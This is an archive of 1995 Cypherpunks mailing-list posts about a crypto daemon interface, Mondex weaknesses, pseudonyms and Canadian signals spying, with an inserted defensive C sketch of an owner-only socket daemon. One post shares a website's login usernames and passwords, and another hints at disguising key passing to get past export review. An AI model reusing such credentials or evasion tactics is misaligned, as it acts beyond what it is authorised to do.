Users are transported to 3D sites via a wide range of vehicles, including rockets, jets, ships, buses, and trains. Over the next six to nine months, ZD3D will include 3D chat, animated objects, and 3D sound. Experience the brave new world of virtual reality on the Web. Experience ZD3D today! * * * * * * * * * * ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS Just don't have enough time to design your own home page? Relax, help is on the way. The ZD Net How To Design Your Own Home Page SnapSolution http://www.zdnet.com/~zdi/software/snapsol/snapmain.html provides all the knowledge you need to stake a claim on the World Wide Web and to put up your own site for the whole world to see. This informative, entertaining guide offers a step-by-step tutorial, using programs chosen from the thousands of files in ZD Net's shareware libraries as well as colorful screen shots illustrating the key points. SnapSolutions offer hands-on, step-by-step advice on how to make your life more productive using shareware. Appearing each month, SnapSolutions will focus on both computing and non-computing goals alike. The next two SnapSolutions will help you create our own screen saver and holiday greeting cards. SnapSolutions: shareware at its best. * * * * * * * * * * MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX Got an extra couple of grand burning a hole in your pocket? Maybe it's time you invested in the Internet. Introducing the Inter at ctive Week Internet Index, or @Net Index, http://www.hydra.com/interactive_week.html a collection of 37 Internet-related companies that give investors a formal measure of the performance of the emerging Internet industry. The @Net Index, which trades under the symbol IIX, was developed by Inter at ctive Week and the American Stock Exchange to better measure the performance of businesses associated with the Internet. 
It does this by focusing on select Internet service providers, commercial online service companies, Internet tool companies, multimedia publishers, and networking companies. The @Net Index also includes providers of technology expected to shape the future of the Internet, such as videoconferencing and interactive television. The @Net Index is a bona fide investment vehicle; options contracts on it will trade every business day on the floor of the American Stock Exchange. Investors will trade options based on the direction the index takes, over time. Initial expiration months are November and December 1995; January, April, and July 1996. The @Net Index closed Oct. 17 at 215.04, up 52 percent since the beginning of 1995. The Standard & Poor's 500 was up 28 percent for the same period. For more information about investing in the Index, call (800) THE-AMEX or check out the AMEX's Web site at http://www.amex.com. The Inter at ctive Week Web site (http://www.zdnet.com/~intweek) provides trading updates. * * * * * * * * * * ZD Net Update is the official newsletter of ZD Net/World Wide Web Edition. It is compiled by Tom Schmidt (tom_schmidt at zd.com). Feel free to respond with any news, notes, comments, or suggestions. To unsubscribe to ZD Net Update, point your browser to: http://www.zdnet.com/cgi-bin/ziffmail.pl/update and select "Unsubscribe to ZD Net Update." From attila at primenet.com Sat Nov 18 10:26:35 1995 From: attila at primenet.com (attila) Date: Sun, 19 Nov 1995 02:26:35 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <199511181441.JAA02040@homeport.org> Message-ID: On Sat, 18 Nov 1995, Adam Shostack wrote: > Raph Levien wrote: > > | I propose that the new interface lives as a sort of daemon, rather [snip] > | > > A daemon per user, or per machine? Either way, I think you > run into problems on a big multi-user machine. (Either its an extra > process or two per person, or its a great target for attack & > subversion. 
> _anything_ that has open access on a piece of hardware is a point of intrusion --sendmail for instance, or open password files, etc. the issue is trading off risks to _maximize_ security and impenetrable access. even assuming we were to post 100% of the source code, a translation daemon is a _translation_ model --even if it is capable of translating pgp, garbage in equals nothing out... one of the biggest problems with _any_ crypto system, and pgp is no exception, is tmp files, followed closely by insecure memory. insecure memory is a separate issue, but some of the temporary file problems can be relegated to reduced risk by passing the daemon the user's preferred location for tmp file --for instance, on any net access machine, I globally specify TMP, TEMP, etc to a local tmp directory which is at least somewhat safer than public tmp files. obviously, you expect the daemon to wipe clean each memory block before it free()s it --I'm sure we all have routines handy for that. presuming the daemon is constructed so it can only respond to its current process owner, this leaves the security problem of swapping in a daemon which also responds to an interloper --and this same risk applies to a libpgp or a .dll file (more so to a .dll file) to an even greater degree. However, if a daemon is swapped, the system has a more _serious_ problem with the system administrator, not the daemon. if the IPC strings are intercepted in the daemon initialization, again we have a basic hardware and system security problem. Even if Raph Levien believes daemons are serious risk problems (which they can be if not properly implemented), I do not agree that the libpgp() or .dll offer anything additional. I don't presume to believe that anything is safe anyway, just safer than the alternative. NB: _nothing_ should ever be assumed secure! assumption is fuckup's mother. 
one must hope to have considered every possible line of attack, and a few which have not been conceived, which goes back to our cypherpunk "credo" which says that private standards are not safe --let's all have at it --even if we break it, there probably is a way to block the attack, we just did not block it or consider it the first time, I have been playing with all three approaches, and I keep going back to the daemon despite the fact it is not portable to the brain dead. I don't know if W95 permits daemons as I have ignored MS for a number of years --if I can not run as many processes as I want without some MickeySoft program blowing away a day's work.... I presume NT will run 'em, and maybe the next release of NT will be more useable, more secure, and more stable. Since pgp() has been pulled from crypto10, I need to modularize pgp to a pgp() and include the relevant goodies such as MIME and its variations. And, of course, we need all the "we do it here" types to buy into a standard interface. And, to add fuel: the module needs the ability to encode and place clear text into a MIME format specified by the calling program. > Its an interesting proposal, but let me ask you this--Why is > it better than a libpgp (or pgp.dll) that offers a variety of services > to programs at multiple levels (ie, offers full one call RSA/IDEA > encryption and compression, as well as ascii armoring, or offers each > of those as a separate function. > not necessarily better. but a valid approach IMHO. I for one think it would be easy enough to sell IAPs on a daemon. > > > > -- > "It is seldom that liberty of any kind is lost all at once." 
> -Hume > From sameer at c2.org Sat Nov 18 10:33:36 1995 From: sameer at c2.org (sameer) Date: Sun, 19 Nov 1995 02:33:36 +0800 Subject: protecting against impersonation (was: CANADIAN PRESS REPORTS) In-Reply-To: <29172.9511181558@exe.dcs.exeter.ac.uk> Message-ID: <199511181816.KAA18622@infinity.c2.org> > > This post wasn't signed off, but I presume you are "Alice d'nonymous", > it would help lots if you could get yourself an account with a nym > server, such as alpha at c2.org. That would have the advantages that > your email address would be recognizable, and that people could reply > to you if they wanted to. it's alpha.c2.org, not alpha at c2.org, btw. The added benefit of this is that people could killfile you easily. > > If having a working reply address bothers you, well at least sign your > posts, if you're concerned about a persistant identity, the tools are > available to do it. Complaining about things which have simple > technological solutions won't get you much sympathy. > > Adam > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From raph at c2.org Sat Nov 18 11:14:13 1995 From: raph at c2.org (Raph Levien) Date: Sun, 19 Nov 1995 03:14:13 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <199511181441.JAA02040@homeport.org> Message-ID: <199511181856.KAA24071@infinity.c2.org> Adam Shostack wrote: > A daemon per user, or per machine? Either way, I think you > run into problems on a big multi-user machine. (Either its an extra > process or two per person, or its a great target for attack & > subversion. One per user. I'm thinking that, most of the time, the daemon process would only last as long as the application. 
It is certainly true that if there were to be one daemon per machine, the security requirements would be a lot greater, as it would no longer be possible to rely on the operating system to get the file permissions right, etc. On the other hand, the daemon process better be done right, or you're in trouble anyway. > Its an interesting proposal, but let me ask you this--Why is > it better than a libpgp (or pgp.dll) that offers a variety of services > to programs at multiple levels (ie, offers full one call RSA/IDEA > encryption and compression, as well as ascii armoring, or offers each > of those as a separate function. Exportability. There is a general feeling that a mailer program with specific hooks to libpgp is going to have trouble with exportability (and forget about binaries), where a program that supports a generic interface (the likes of .mailcap) is out of the NSA's jurisdiction. Of course, this is speculation until we actually get a ruling, but it sounds plausible enough to me to warrant spending some time on design and implementation. Your question brings up another point: if the daemon process is going to run as the personal slave of the application, then why not a dynamic library instead? Two reasons. First, on Unix anyway, interprocess communication through domain sockets is a more mature, robust, and portable technology than dynamically linked libraries. On Windows, it's probably the other way around, and that's worth thinking about. The real reason is, though, that the daemon and application should naturally be distrustful of each other's address spaces. Can you see Netscape shipping code that links in a Joe Random dll? Conversely, do you want your PGP secret data structures sharing an address space with one of Netscape's beta releases? Using two processes in two address spaces solves this problem. 
Jeff, if you're reading this, what do you think Netscape's chances are for supporting such a protocol, assuming of course that there were nicely implemented daemons, and that the protocol itself was going to standards track? Is it something you'd be interested in? Raph From sandfort at crl.com Sat Nov 18 11:17:59 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Sun, 19 Nov 1995 03:17:59 +0800 Subject: NOT CRYPTO RELATED (GET OVER IT) Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Bay Area S'punks, Monday, 11/20 5pm Scott Adams, at the Booksmith in San Francisco. The creator of the comic starring engineer Dilbert and his dog Dogbert, will sign his latest book ``It's Obvious You Won't Survive by Your Wits Alone.'' 1644 Haight St., San Francisco. (415) 863-8688. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From anonymous-remailer at shell.portal.com Sat Nov 18 11:18:08 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 19 Nov 1995 03:18:08 +0800 Subject: No Subject Message-ID: <199511180330.TAA19479@jobe.shell.portal.com> Subject: Shoe-horning Mondex onto the Internet -- still won't fit There are many high barriers to the shoe-horning of Mondex onto the Internet: + Was not designed for the Internet, rather for physical portable cards + Requires expensive hardware: >$100/board for a PC in start-up quantities + According to inside sources, is vulnerable to MITM between payer and payee + According to inside sources, is grossly vulnerable to replay attacks (offline multi-spending to different parties) + The designers have zero experience and reputation in the cryptographic and computer security communities + None of the Mondex designs have been published or peer reviewed. 
+ The protocol cannot be published for security reasons, which means -- Mondex has security holes -- Customers who defraud Mondex-using banks have legal deniability in a court of law: they can simply request banks to produce the security protocols as evidence; if they refuse the case is thrown out of court (precedent: UK and US phantom-ATM withdrawal cases) From tcmay at got.net Sat Nov 18 11:25:15 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 19 Nov 1995 03:25:15 +0800 Subject: ZD Net Update v.1 #2 Message-ID: At 5:11 PM 11/18/95, ZD Net / World Wide Web Edition wrote: >__________________________________ZD Net Update_______________________________ >v. 1 #2 11-13-95 > >Welcome to ZD Net Update, the free E-mail newsletter created especially for >registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition. >ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting >developments on ZD Net. (rest of long newsletter deleted....) Ah, someone has once again subscribed the Cypherpunks list to a newsletter. Will the person who did this please have the decency to reverse this situation? (There are instructions at the end, but the syntax of the "unsubscribe" command may imply that only the site from which the subscribe was initiated can unsub. Whoever subscribed us can unsub us.) Do I have to point out that just a single one of these long newsletters takes up more list bandwidth than most of the putatively "off-topic" posts do? --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." 
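Added example, not code from any poster or from PGP: a sketch of the per-user daemon discussed in the "Design proposal: crypto-capable generic interface" messages above, showing the precautions attila and Raph Levien name there: a socket kept in a private directory under the user's chosen temp location, a daemon that answers only its own process owner, and buffers wiped before free(). It assumes Linux (SO_PEERCRED); the names cryptd, serve_one and demo, the constructed "hello" request, and the XOR stand-in for the real crypto operation are all hypothetical.

```c
#define _GNU_SOURCE 1              /* mkdtemp() under strict -std modes */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/un.h>
#define MAX_REQ 4096
/* Same layout as Linux's struct ucred (socket(7)), declared locally. */
struct peercred { pid_t pid; uid_t uid; gid_t gid; };

/* Overwrite via a volatile pointer so the stores cannot be optimised away. */
static void wipe(void *p, size_t n)
{
    volatile unsigned char *v = p;
    while (n--) *v++ = 0;
}

/* 1 if the peer of a connected AF_UNIX socket runs under uid `owner`,
 * 0 if under another uid, -1 on error. Linux-specific (SO_PEERCRED). */
static int peer_is_owner(int fd, uid_t owner)
{
    struct peercred cred;
    socklen_t len = sizeof cred;
    if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cred, &len) != 0)
        return -1;
    return cred.uid == owner;
}

/* Listen on <base>/cryptd.XXXXXX/sock. mkdtemp() creates the directory
 * with mode 0700, so other local users cannot reach the socket file. */
static int listen_private(const char *base, char *dir, size_t dirlen,
                          struct sockaddr_un *sa)
{
    int fd;
    if (snprintf(dir, dirlen, "%s/cryptd.XXXXXX", base) >= (int)dirlen
            || mkdtemp(dir) == NULL)
        return -1;
    memset(sa, 0, sizeof *sa);
    sa->sun_family = AF_UNIX;
    snprintf(sa->sun_path, sizeof sa->sun_path, "%s/sock", dir);
    fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0 || bind(fd, (struct sockaddr *)sa, sizeof *sa) != 0
               || listen(fd, 1) != 0) {
        if (fd >= 0) close(fd);
        unlink(sa->sun_path); rmdir(dir);
        return -1;
    }
    return fd;
}

/* Serve one request: refuse a peer that is not `owner`; otherwise read,
 * apply a stand-in transform, reply, and wipe the buffer before free().
 * Returns the number of bytes served, or -1 if refused or failed. */
static long serve_one(int cfd, uid_t owner)
{
    unsigned char *buf;
    ssize_t n, i;
    long served = -1;
    if (peer_is_owner(cfd, owner) != 1 || (buf = malloc(MAX_REQ)) == NULL)
        return -1;
    n = read(cfd, buf, MAX_REQ);
    for (i = 0; i < n; i++)
        buf[i] ^= 0x5a;                /* placeholder only, NOT encryption */
    if (n > 0 && write(cfd, buf, (size_t)n) == n)
        served = (long)n;
    wipe(buf, MAX_REQ);
    free(buf);
    return served;
}

/* Daemon and client in one process, for demonstration only. `owner` is
 * the uid the daemon accepts; returns what serve_one() returned. */
static long demo(uid_t owner)
{
    const char *base = getenv("TMPDIR");   /* user's preferred temp dir */
    char dir[80], reply[8];
    struct sockaddr_un sa;
    long r = -1;
    int sfd = -1, cfd = socket(AF_UNIX, SOCK_STREAM, 0);
    int lfd = listen_private(base ? base : "/tmp", dir, sizeof dir, &sa);
    if (lfd < 0) { if (cfd >= 0) close(cfd); return -2; }
    if (cfd >= 0 && connect(cfd, (struct sockaddr *)&sa, sizeof sa) == 0
            && write(cfd, "hello", 5) == 5   /* constructed request */
            && (sfd = accept(lfd, NULL, NULL)) >= 0) {
        r = serve_one(sfd, owner);
        close(sfd);
        if (r == 5 && read(cfd, reply, sizeof reply) != 5) r = -3;
    }
    if (cfd >= 0) close(cfd);
    close(lfd); unlink(sa.sun_path); rmdir(dir);
    return r;
}

int main(void)
{
    printf("owner: %ld, other uid: %ld\n", demo(geteuid()), demo(geteuid() + 1));
    return 0;
}
```

The uid check and the 0700 directory overlap on purpose: either one alone keeps other local users away from the socket, and neither helps once the daemon binary itself has been replaced, which is the case attila assigns to the system administrator rather than the daemon.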
From aleph1 at dfw.net Sat Nov 18 11:36:01 1995 From: aleph1 at dfw.net (Aleph One) Date: Sun, 19 Nov 1995 03:36:01 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <199511181441.JAA02040@homeport.org> Message-ID: On Sat, 18 Nov 1995, Adam Shostack wrote: > A daemon per user, or per machine? Either way, I think you > run into problems on a big multi-user machine. (Either its an extra > process or two per person, or its a great target for attack & > subversion. Not any more a target for attack than a shared library. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From raph at c2.org Sat Nov 18 11:43:15 1995 From: raph at c2.org (Raph Levien) Date: Sun, 19 Nov 1995 03:43:15 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: Message-ID: <199511181926.LAA26947@infinity.c2.org> attila brings up many good points, including: > one of the biggest problems with _any_ crypto system, and pgp is > no exception, is tmp files, followed closely by insecure memory. > insecure memory is a separate issue, but some of the temporary file > problems can be relegated to reduced risk by passing the daemon the > user's preferred location for tmp file --for instance, [...] An even better solution is to design the cryptosystem so that it doesn't _need_ temp files in the first place. MOSS wins, PGP loses. I don't know enough about S/MIME to say. In a related vein, Darren New sent me a pointer to First Virtual's SMXP (Simple Mime eXchange Protocol). This is a cool protocol that does about 50% of what I'm talking about. 
If you're interested, here it is: ftp://ftp.fv.com/pub/docs/smxp-spec.{ps,txt} In order to adapt SMXP into something that's useful for what I've proposed, numerous changes would need to be made: * Unix Domain Sockets instead of TCP * Add negotiation * Add authentication Without these three changes, the system is nearly useless for crypto. Further, there are two "aesthetic" points I'd like to see cleaned up given the chance. First, SMXP makes the "ASCII assumption." Since the daemon and app will be tightly coupled, definitely running on the same machine, there is no reason to exclude binary MIME objects. On the other hand, as far as I know, all of the MIME crypto protocols are ASCII based (somebody please correct me if S/MIME is the exception). Second, in order to support operation without temp files, it's necessary to interleave the operations of transferring the object from the app to the daemon and vice versa. I have a proposal for a lower-level spec which can handle this quite readily, if anyone is interested. Unfortunately, the proposal doesn't look much like SMXP. However, the possibility of creating a prototype based on SMXP is intriguing. Raph P.S. Did anyone see the mention of the perl/RSA CJR in the latest Wired? Managed to get the attribution wrong. Still no response. From norm at netcom.com Sat Nov 18 12:30:18 1995 From: norm at netcom.com (Norman Hardy) Date: Sun, 19 Nov 1995 04:30:18 +0800 Subject: Request for URL'S Message-ID: At 7:31 PM 11/6/95, Censored Girls Anonymous wrote: .... >I'd love to make a Cypherpunk URL page, >so if you will send your five favorite URL's >I'll put them all on a page like The Dreams Page, >(http:www.primenet.com/~carolab/dreams.html) >and turn it loose on the net. 
The following seems to be a pretty good nexus: http://www.quadralay.com/www/Crypt/Crypt.html There is, of course http://www.oberlin.edu/~brchkind/cyphernomicon/ A crypto legal centre: http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm Happy Hunting From Richard.Johnson at Colorado.EDU Sat Nov 18 13:11:35 1995 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Sun, 19 Nov 1995 05:11:35 +0800 Subject: RealAudio website TEMPORARY PASSWORD Message-ID: > > Username: cpunks >TEMPORARY Password: New.Norfolk > I assume that temp password will be changed to cypherpunks soon. Note that Username: cypherpu [8 char limit] Password: cypherpunks also works. Someone set it up a few months ago. Richard From s1113645 at tesla.cc.uottawa.ca Sat Nov 18 13:31:26 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 19 Nov 1995 05:31:26 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <199511181926.LAA26947@infinity.c2.org> Message-ID: On Sat, 18 Nov 1995, Raph Levien wrote: > An even better solution is to design the cryptosystem so that it > doesn't _need_ temp files int he first place. MOSS wins, PGP loses. I MOSS? From anonymous-remailer at shell.portal.com Sat Nov 18 15:37:02 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 19 Nov 1995 07:37:02 +0800 Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV) Message-ID: <199511182325.PAA04123@jobe.shell.portal.com> On Sat, 18 Nov 1995 anonymous-remailer at shell.portal.com wrote: > >Taking three successive news stories from three days ... (press stories, > >I've since pulled for my own reference) and pasting them together to > >indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 
> > I still feel such a sense of violation with what LD did, such an utter > sense of helplessness at the character assassination I've suffered at his > hands, that I feel that I must take some token action to "set the > record straight". Something which clears my name. > > Here is the TRUE unedited story for the list which Deitweiler felt he > had to TWIST to the nth degree. His attempt at making mountains out > of mole hills will not succeed with this one. This story truly is a non-starter. Big deal. It really has no relevance to this international list. This is simply a Canadian matter. So Canada spied on its allies -- Mexico and South Korea particularly -- and possibly picked up some information which helped Canada to outbid the United States on a lucrative wheat deal with China. So what?? As they say ... you snooze you loose. Deitweiler's attempt to get American farmers into the picture isn't going to work. The part about wheat sales isn't even remotely relevant to the story. It's a single paragraph. CSE has a mandate and follows it. No one needs to listen to Deitweiler's rantings and whinings, and his so-called outrage. As the box at the end of the story shows, Canada simply doesn't currently have the budget to do a really broad search of the United States or Mexico. It just can't pick up every American's phone calls. The story isn't about that. It's simply about listening in on a woman's phone call to her doctor. His attempt to make more out of this than what is actually there, and in the process to sully my good name won't work. Let the readers judge for themselves, based on the ORIGINAL stories rather than LD's cut and paste and his personal *commentary*. And hopefully no one will judge me, for his words. Let the story simply speak for itself. 
SPY WORLD Electronic snooping part of the trade game with friendly countries Intelligence agencies comb the airwaves for useful data Jim Bronskill The Canadian Press OTTAWA Intelligence experts said Monday it's no big secret that Canada's high-tech spy agency snoops on friendly countries for financial gain. Increasingly, intelligence agencies around the world are using their antennas, computers and codebreakers to gather economic information, said Wesley Wark, a University of Toronto history professor. Some of Canada's largest trading partners -- including the United States, France and Japan -- comb the airwaves for useful information, so Canada would be foolish not to join the game, said Wark. "I don't know what a friendly power in the economic sphere is, exactly, these days," he said. "That seems to be a very ambiguous term." Canada's secretive Communications Security Establishment -- an arm of the Defence Department -- collects and analyses communications traffic on the activities of foreign states, corporations and people. Jan Shorten, a former CSE employee, told CTV News in an interview Sunday the agency spied on Canada's allies and trading partners -- including Mexico and South Korea -- by eavesdropping on embassies, consulates and diplomats. In a follow-up segment for broadcast Monday, Shorten said the CSE frequently intercepted telephone conversations and faxes of Canadians working at foreign embassies in Canada. The government acknowledged earlier this year it uses CSE data to help develop foreign and defence policies. In New Zealand where a meeting of Commonwealth countries just wrapped up, Prime Minister Jean Chretien did not deny Canada is spying on allies. "This is an organization that works within the law of Canada," Chretien told reporters. "They do not report to me on a daily basis and I cannot make any comments on if they are spying on anybody, I don't know. "But they have a mandate to check a few things around the world. 
Probably somebody is listening to us at this moment." The prime minister also said that if any laws have been broken, "somebody will have to pay the price." In a book published last year, former CSE employee Mike Frost told how the agency electronically picked up information that helped Canada outbid the United States on a lucrative 1982 wheat deal with China. Such clandestine behaviour may be unethical, but countries do it, said U.S. journalist David Kahn, who has written extensively on intelligence matters. "It's just too valuable to give up," said Kahn, a visiting historian at the National Security Agency, the CSE's much larger U.S. cousin. "I wouldn't be surprised if the United States was trying to break Canadian codes." Ottawa maintains that the CSE, the NSA and their counterparts in Britain, Australia and New Zealand have all agreed not to spy on each other. The government also says the CSE does not target Canadians and scrupulously abides by Canadian laws. Shorten said the CSE stepped up its operations against foreign embassies in Canada in 1991. She recalled hearing conversations of Canadians employed there -- even one woman's phone call to her doctor. An appalled Shorten eventually confronted her boss, who assured her the practice was legal. The agency is obligated to destroy information about Canadians it scoops up in its electronic net, said Wark. A rare exception might be a phone call describing a terrorist plot. [The story also had a little box with some Quick Facts in it] QUICK FACTS EMPLOYEES: About 900 1995-96 BUDGET: $113 Million HQ: Sir Leonard Tilley Building, behind a three metre fence tipped with barbed wire in south Ottawa. ROLE: Secretive arm of Defence Department monitors and analyses communications about activities of foreign states, corporations and individuals. Also helps government stop Canadian signals from being intercepted. SHARES: Intelligence with counterparts in United States, Britain, Australia, New Zealand. 
And that's all she wrote ... From perry at piermont.com Sat Nov 18 16:06:31 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 19 Nov 1995 08:06:31 +0800 Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV) In-Reply-To: <199511182325.PAA04123@jobe.shell.portal.com> Message-ID: <199511182351.SAA00184@jekyll.piermont.com> I hope everyone realizes that Detweiler is probably arguing with himself, three levels deep. I must admit that the levels he stoops to in order to draw attention to himself are pathetic. Why don't you just stick to posting as Vlad Nurzi? Its more dignified. anonymous-remailer at shell.portal.com writes: > On Sat, 18 Nov 1995 anonymous-remailer at shell.portal.com wrote: > > > >Taking three successive news stories from three days ... (press stories, > > >I've since pulled for my own reference) and pasting them together to > > >indicate some type of Machiaevellian?? (sp) exercise is simply "not done." > > > > I still feel such a sense of violation with what LD did, such an utter > > sense of helplessness at the character assassination I've suffered at his > > hands, that I feel that I must take some token action to "set the > > record straight". Something which clears my name. > > > > Here is the TRUE unedited story for the list which Deitweiler felt he > > had to TWIST to the nth degree. His attempt at making mountains out > > of mole hills will not succeed with this one. > > This story truly is a non-starter. Big deal. It really has no > relevance to this international list. This is simply a Canadian matter. From ericande at cnw.com Sat Nov 18 16:23:11 1995 From: ericande at cnw.com (Eric Anderson) Date: Sun, 19 Nov 1995 08:23:11 +0800 Subject: Visual Basic 4.0 encryption prog. Message-ID: <01BAB5D0.4CBEAEE0@king1-04.cnw.com> I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. 
I plan on buying Applied Cryptography probably on Fri. when I get paid. My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the-shelf" code. So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler. I don't really care about ITAR or any of that other BS, I just won't put MY name on it. From chen at intuit.com Sat Nov 18 16:57:45 1995 From: chen at intuit.com (Mark Chen) Date: Sun, 19 Nov 1995 08:57:45 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: Message-ID: <9511170143.AA07316@doom> > On Thu, 16 Nov 1995, Scott Brickner wrote: > > > > You'd need a program which not only *accepted* the additional parameter, > > but also *needed* the second parameter. I confess I have some difficulty > > thinking of one. > > It's not too hard to think of a compression scheme that needs extra > information to be passed from client to server; the obvious example is > some sort of dictionary compression with external dictionaries (can be > very effective for short messages where LZW etc never get a chance to get > going). > > Another, more likely case, is where the object could have been compressed > by several schemes, and a scheme ID is needed to determine which > algorithm to use. But the problem is more on the application side than on the library side. If necessary, you can simply design the plug-in crypto function to regard the first n bytes of the input buffer as a key. On the other hand, how do you explain why your application (for which you're seeking export approval) is generating keys in the first place? And what's this other piece of code over here that just sits around and captures mouse movements at random intervals? 
:) - Mark - -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From sinclai at ecf.toronto.edu Sat Nov 18 17:01:13 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Sun, 19 Nov 1995 09:01:13 +0800 Subject: [NOISE] LD is Canadian? In-Reply-To: <199511182351.SAA00184@jekyll.piermont.com> Message-ID: <95Nov18.194403edt.330@cannon.ecf.toronto.edu> > I hope everyone realizes that Detweiler is probably arguing with > himself, three levels deep. I must admit that the levels he stoops to > in order to draw attention to himself are pathetic. Why don't you just > stick to posting as Vlad Nurzi? It's more dignified. Appealing as the idea is, some of these posts have shown a good understanding of Canadian politics and current events. I think it unlikely that LD could have written all of them. From anonymous-remailer at shell.portal.com Sat Nov 18 17:07:51 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 19 Nov 1995 09:07:51 +0800 Subject: negative reputation (was: WRITTEN CODE) Message-ID: <199511190053.TAA21421@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Daniel 'genius' Charpentier wrote: > he mentioned his desire to see more cryptographic program code and > I didn't want to see this initiative die. I am a newcomer to > cryptography and I know I shouldn't be posting yet but that is > what I thought cypherpunk postings was supposed to be in the first > place ( program code, protocols, and algorithms ). Please don't > flame me too badly for this message. I am doing everything I am > supposed to before posting ( reading the FAQ's, the entire > cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier ) It sounds like you are afraid of getting a negative reputation. Well don't be. Simply create a persistent pseudonym and sign your messages with it instead. 
That way, if it turns out that everyone disagrees with you and/or flames you to death, you can simply discard your old pseudonym. Otherwise you keep your pseudonym and continue to post under it. This technique is not new, so you may already have seen it in the archive. Logically, a pseudonym is simply a public key. However you may want to give it a human-readable name so other people may more easily refer to it. If you decide to do this, I suggest that you do not name the key on its first post because there is a high probability that you will decide to discard the key. If you name it and throw it away, then you have unnecessarily cluttered up the limited name space. - a new entity, as yet unnamed - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] From llurch at networking.stanford.edu Sat Nov 18 17:32:38 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Sun, 19 Nov 1995 09:32:38 +0800 Subject: Spammers' Email List Obtained!!! 
Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Using only the tools provided by the spammer, and without compromising system security in any way, we have obtained the full list of email addresses that were used by the bulkd at valleynet.net direct email spammer. I am not going to tell the public how to get it because I do not want this list to fall into the wrong hands. There are several curious features about the list that strongly suggest that it was purchased from other spammers. I *strongly encourage* the person who formerly used the bulkd at valleynet.net account to apologize to news.admin.net-abuse.misc and provide us with the source of the list immediately. - -rich llurch at networking.stanford.edu From sdavidm at iconz.co.nz Sat Nov 18 18:01:26 1995 From: sdavidm at iconz.co.nz (David Murray) Date: Sun, 19 Nov 1995 10:01:26 +0800 Subject: Anonymity and Intellectual Capital In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- To pick up on a couple of Professor Post's ideas - limited liability of untraceable pseudonyms, and choice of rule sets in cyberspace (see Post, "Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace" 1995 J Online Law art 3), I suggest that arbitration is well suited to pseudonymous commerce, and propose the use of an old device - the unincorporated, or deed of settlement, company. Contract seems likely to be the basic building block of pseudonymous digital commerce for the foreseeable future (barring a mathematical solution to the non-repudiation problem). 
